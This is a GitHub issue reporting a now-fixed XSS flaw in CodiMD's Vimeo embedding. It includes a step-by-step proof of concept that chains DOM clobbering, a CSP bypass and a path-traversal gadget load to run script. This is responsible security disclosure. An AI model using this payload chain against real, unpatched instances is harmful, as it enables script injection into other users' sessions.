search

hackmdio / codimd

CodiMD - Realtime collaborative markdown notes on all platforms.
https://hackmd.io/c/codimd-documentation
GNU Affero General Public License v3.0
9.11k stars 1.05k forks source link

XSS Vulnerability in Embeding Vimeo Video Feature #1774

Closed splitline closed 1 year ago

splitline commented 1 year ago

This issue has been reported to HackMD and has been patched on hackmd.io.

Root Cause

It doesn't check data-videoid attribute at all, and directly concat it into the JSONP URL. In this way we can load arbitrary file under https://vimeo.com as JavaScript, which might cause XSS.

https://github.com/hackmdio/codimd/blob/e7a5ea813ab684f5c9569dcee3423dd9c442b9bd/public/js/extra.js#L318-L329

PoC

Step 1. Create a note with content alert(document.domain);, and

Step 2. Create a note with the following content:

<!-- DOM clobbering + CSP Byapss  -->
<img src="/<note-id-created-in-step-1>/download" id="_zxcvbnSettings">
<!-- load gadget  -->
<div class="vimeo raw" data-videoid="../../../blog/wp-includes/js/zxcvbn-async.js#"></div>

Step 3. View it and trigger the XSS!

Technical Detail (Chinese): https://blog.splitline.tw/hackmd-xss/

jackycute commented 1 year ago

Fixed by #1792